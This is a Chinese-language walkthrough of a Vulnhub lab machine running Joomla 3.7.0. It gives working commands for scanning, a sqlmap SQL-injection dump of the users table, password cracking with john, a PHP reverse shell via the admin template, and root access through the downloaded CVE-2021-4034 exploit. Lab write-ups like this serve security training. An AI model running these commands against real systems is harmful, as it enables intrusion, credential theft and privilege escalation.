kali：192.168.111.111

靶机：192.168.111.250

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.250

通过nmap得知目标CMS为Joomla 3.7.0

漏洞利用

搜索发现该版本存在sql注入

利用sqlmap获取目标后台用户密码

sqlmap -u "http://192.168.111.250/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --batch -p list[fullordering] -D 'joomladb' -T '#__users' -C 'username,password' --dump

得到的密文用john爆破得到密码：snoopy

john hash --wordlist=/usr/share/wordlists/rockyou.txt

登录后台写入php反弹shell

之后访问http://192.168.111.250/templates/beez3/shell.php，获得反弹shell

提权

上传linpeas.sh进行信息收集：https://github.com/carlospolop/PEASS-ng/，发现可以内核提权

CVE-2021-4034提权：https://codeload.github.com/berdav/CVE-2021-4034/zip/main

unzip CVE-2021-4034-main.zip
cd CVE-2021-4034-main
make
./cve-2021-4034

flag

本栏目推荐文章
• BOSHIDA DC电源模块的关键参数解读
• vulnhub-DC-6
• BOSHIDA DC电源模块技术的未来发展趋势
• BOSHIDA 了解DC电源模块的基本参数及选择方法
• vulnhub靶场渗透学习
• BOSHIDA DC电源模块的故障排查与维修技巧
• AP5127 DC-DC降压恒流IC 12-24V 9V2A 40珠双色LED车灯方案
• BOSHIDA DC电源模块的安全性能评估及认证标准
• vulnhub-DC-5
• BOSHIDA DC电源模块的可持续发展与环境保护

靶机 Vulnhub DC靶机vulnhub dc 靶机dc vulnhub_dc vulnhub-dc vulnhub-dc vulnhub dc 靶场vulnhub dc vulnhub_dc流程vulnhub dc vulnhub-dc流程vulnhub dc vulnhub_dc vulnhub dc wp 靶机hacksudo过程vulnhub